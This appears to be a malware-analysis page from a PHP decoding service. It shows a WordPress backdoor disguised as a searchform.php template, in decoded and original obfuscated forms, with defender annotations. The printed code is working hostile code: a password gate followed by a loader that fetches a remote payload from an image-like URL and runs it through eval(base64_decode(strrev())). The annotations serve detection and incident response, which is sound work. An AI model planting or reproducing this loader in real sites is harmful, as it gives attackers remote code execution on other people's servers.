
PHP Decode

<?php goto NLnKLsvYFH; NLnKLsvYFH: $pas = "\x37\60\x63\62\x62\71\x39\67\x36\143\x36\144\..

Decoded Output

<?php 
// NOTE(review): defender annotation. This is the access gate in front of the remote-code
// loader further down the same file.
// - $pas is a 32-hex-digit string that is compared against md5() of the posted "password"
//   field, i.e. an unsalted MD5 digest of the operator's password.
// - error_reporting(0) hides PHP errors; set_time_limit(0) lifts the execution time limit.
// - A correct password stores that digest in $_SESSION["loggedokm"], so later requests pass
//   the gate on the session value alone.
// - A request without a matching session value receives a page with an empty title that
//   holds only a password form, and the script exits before anything else runs.
// - Control flow is flattened into goto jumps between randomly named labels, so the
//   statements do not read top to bottom.
// Hunting hints visible in this listing: the session key "loggedokm", and a POST field named
// "password" handled by a file whose docblock presents it as a WordPress searchform.php template.
// The decoder left \xd and \xa (CR and LF) unresolved and printed the inner double quotes of
// the echoed string unescaped, so this rendering is for reading rather than running.
 goto NLnKLsvYFH; NLnKLsvYFH: $pas = "70c2b9976c6d53760e3c3de79f728f3d"; error_reporting(0); set_time_limit(0); session_start(); if (isset($_SESSION["loggedokm"])) { goto DqqOhzX5B0; } goto u3NT7x2QrJ; u3NT7x2QrJ: $_SESSION["loggedokm"] = false; DqqOhzX5B0: if (!isset($_POST["password"])) { goto pb73Ufbn0o; } if (!(md5($_POST["password"]) == $pas)) { goto mr5E2rLws5; } $_SESSION["loggedokm"] = md5($_POST["password"]); goto SjaSVtI46I; SjaSVtI46I: mr5E2rLws5: pb73Ufbn0o: if (!(!$_SESSION["loggedokm"] || $_SESSION["loggedokm"] != $pas)) { goto EXNN3Tp2rS; } echo "\xd\xa<html><head><title> </title></head>\xd
  <body>\xd\xa    <p align="center"><center><font style="font-size:13px" color="#fde6cd" face="">
    <form method="post">
\xa      <input type="password" name="password">\xd
      <input type="submit" name="submit" value="  >>">
\xa    </form>
  </body>\xd
</html>
\xa
\xa"; exit; goto ocC9gxzse4; ocC9gxzse4: EXNN3Tp2rS: ?><?php 
 
 
/*  
 * The searchform.php template. 
 * 
 * Used any time that get_search_form() is called. 
 * 
 * @link https://wordpress.org/themes/template/ 
 * @package WordPress 
 * @subpackage  
 * @since 1.0 */ 
  
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
// NOTE(review): defender annotation. $l is the second-stage locator. The URL ends in .jpg,
// but the response is never handled as an image: it is reversed, base64-decoded and passed
// to eval() at the end of this block. The second stage itself is not shown on this page.
// The WordPress template docblock and the long run of blank lines above this point are
// presumably camouflage that pushes the loader out of view in an editor.
$l = "https://user-images.githubusercontent.com/105673502/236584953-2a52fb35-6cd9-437b-8af5-44b8842f540f.jpg"/* "" - ni*/; 
 
 
//DX for each form and a string 
 
 
		 
		// Preferred transport: cURL, when the extension is loaded.
		if( function_exists('curl_init') ) { 
			$ch = curl_init(); 
			curl_setopt($ch, CURLOPT_URL, $l); 
			// Return the response body as a string instead of printing it.
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
			// TLS certificate verification is switched off, so the origin of the payload is not authenticated.
			curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
			// Redirects are followed, so the host that finally serves the payload can differ from the one in $l.
			curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); 
			curl_setopt($ch, CURLOPT_HEADER, FALSE); 
			// Browser-like User-Agent. The "Windows NT 11.0" token is not what real Chrome sends
			// (it reports NT 10.0), which makes this string usable as a proxy/egress-log indicator.
			curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"); 
			$body = curl_exec($ch); 
			curl_close($ch); 
		} 
		else { 
			// Fallback transport: a URL wrapper read, with warnings suppressed by @.
			$body = @file_get_contents($l);			 
		} 
	 // Executes whatever the remote host returned, with no integrity check. Because the code
	 // that ran is decided remotely per request, finding this file means reviewing the whole
	 // host and its outbound request logs, not only removing the file.
	 // Static signature candidate: the call chain eval(base64_decode(strrev(...))).
	 eval(base64_decode(strrev($body)));		 
 
		 
 
 
 
 
?>


Original Code

<?php
// NOTE(review): defender annotation. This is the access gate as it appears on disk. Every
// string literal is written as mixed hex and octal escapes inside double quotes; PHP resolves
// them at parse time, so $pas is the 32-hex-digit string 70c2b9976c6d53760e3c3de79f728f3d,
// the session key is "loggedokm" and the POST field is "password".
// - The posted password is hashed with md5() and compared with $pas; a match stores the
//   digest in the session, so later requests pass on the session value alone.
// - error_reporting(0) hides PHP errors; set_time_limit(0) lifts the execution time limit.
// - A request without a matching session value receives only a password form and the script exits.
// - Control flow is flattened into goto jumps between randomly named labels.
// Because the readable strings exist only after escape resolution, a plain-text search for
// "loggedokm" will not match this file; scan for dense runs of \x and octal escapes together
// with goto labels instead.
 goto NLnKLsvYFH; NLnKLsvYFH: $pas = "\x37\60\x63\62\x62\71\x39\67\x36\143\x36\144\x35\63\x37\66\x30\145\x33\143\x33\144\x65\67\x39\146\x37\62\x38\146\x33\144"; error_reporting(0); set_time_limit(0); session_start(); if (isset($_SESSION["\x6c\x6f\x67\x67\145\144\157\x6b\x6d"])) { goto DqqOhzX5B0; } goto u3NT7x2QrJ; u3NT7x2QrJ: $_SESSION["\x6c\x6f\147\x67\x65\144\157\153\x6d"] = false; DqqOhzX5B0: if (!isset($_POST["\160\x61\x73\163\x77\x6f\x72\x64"])) { goto pb73Ufbn0o; } if (!(md5($_POST["\160\x61\x73\163\x77\157\x72\144"]) == $pas)) { goto mr5E2rLws5; } $_SESSION["\x6c\x6f\x67\x67\145\x64\x6f\153\155"] = md5($_POST["\160\141\x73\163\x77\x6f\x72\x64"]); goto SjaSVtI46I; SjaSVtI46I: mr5E2rLws5: pb73Ufbn0o: if (!(!$_SESSION["\154\157\x67\x67\145\x64\157\x6b\155"] || $_SESSION["\x6c\x6f\x67\147\x65\x64\x6f\x6b\155"] != $pas)) { goto EXNN3Tp2rS; } echo "\xd\xa\74\x68\164\x6d\154\76\74\150\145\x61\x64\76\74\x74\x69\164\154\145\x3e\40\74\x2f\164\x69\x74\x6c\x65\76\x3c\57\150\145\x61\144\x3e\xd\12\40\40\x3c\x62\x6f\144\x79\76\xd\xa\x20\x20\x20\x20\x3c\x70\40\x61\x6c\x69\x67\156\x3d\x22\143\x65\x6e\x74\x65\x72\42\x3e\74\143\145\x6e\164\145\162\x3e\74\x66\157\x6e\164\40\163\x74\171\x6c\145\x3d\x22\x66\x6f\156\164\x2d\x73\151\x7a\x65\72\x31\63\x70\170\x22\40\143\157\154\x6f\162\75\x22\43\x66\x64\145\x36\x63\144\42\x20\x66\x61\143\145\75\x22\x22\x3e\15\12\x20\40\40\x20\74\146\x6f\x72\x6d\x20\155\x65\x74\x68\x6f\x64\75\x22\x70\x6f\x73\x74\42\76\15\xa\40\40\x20\x20\x20\x20\74\151\x6e\x70\x75\x74\x20\164\x79\x70\x65\x3d\42\x70\x61\x73\x73\167\157\x72\144\42\x20\156\x61\155\x65\75\42\x70\x61\x73\x73\x77\x6f\162\144\42\76\xd\12\40\x20\40\x20\x20\x20\x3c\151\156\160\165\164\x20\x74\171\x70\145\x3d\42\163\x75\142\x6d\x69\x74\x22\40\156\141\155\145\75\42\163\165\x62\x6d\x69\164\42\40\x76\141\x6c\165\145\x3d\x22\x20\x20\x3e\76\x22\x3e\15\xa\x20\x20\40\40\74\57\x66\x6f\162\155\76\15\12\x20\x20\74\57\x62\x6f\x64\171\76\xd\12\74\x2f\x68\164\x6d\x6c\x3e\15\xa\15\xa"; exit; goto 
ocC9gxzse4; ocC9gxzse4: EXNN3Tp2rS: ?><?php


/* 
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage 
 * @since 1.0 */
 











































// NOTE(review): defender annotation. $l is the second-stage locator. The URL ends in .jpg,
// but the response is never handled as an image: it is reversed, base64-decoded and passed
// to eval() at the end of this block. The second stage itself is not shown on this page.
// Unlike the gate above it, this part of the file is stored in clear text, so the URL and the
// eval chain are directly searchable on disk.
$l = "https://user-images.githubusercontent.com/105673502/236584953-2a52fb35-6cd9-437b-8af5-44b8842f540f.jpg"/* "" - ni*/;


//DX for each form and a string


		
		// Preferred transport: cURL, when the extension is loaded.
		if( function_exists('curl_init') ) {
			$ch = curl_init();
			curl_setopt($ch, CURLOPT_URL, $l);
			// Return the response body as a string instead of printing it.
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			// TLS certificate verification is switched off, so the origin of the payload is not authenticated.
			curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
			// Redirects are followed, so the host that finally serves the payload can differ from the one in $l.
			curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
			curl_setopt($ch, CURLOPT_HEADER, FALSE);
			// Browser-like User-Agent. The "Windows NT 11.0" token is not what real Chrome sends
			// (it reports NT 10.0), which makes this string usable as a proxy/egress-log indicator.
			curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
			$body = curl_exec($ch);
			curl_close($ch);
		}
		else {
			// Fallback transport: a URL wrapper read, with warnings suppressed by @.
			$body = @file_get_contents($l);			
		}
	 // Executes whatever the remote host returned, with no integrity check. Because the code
	 // that ran is decided remotely per request, finding this file means reviewing the whole
	 // host and its outbound request logs, not only removing the file.
	 // Static signature candidate: the call chain eval(base64_decode(strrev(...))).
	 eval(base64_decode(strrev($body)));		

		




?>

Function Calls

None

Variables

None

Stats

MD5 f70d8b7c5230fbac2cc757a0525794d1
Eval Count 0
Decode Time 43 ms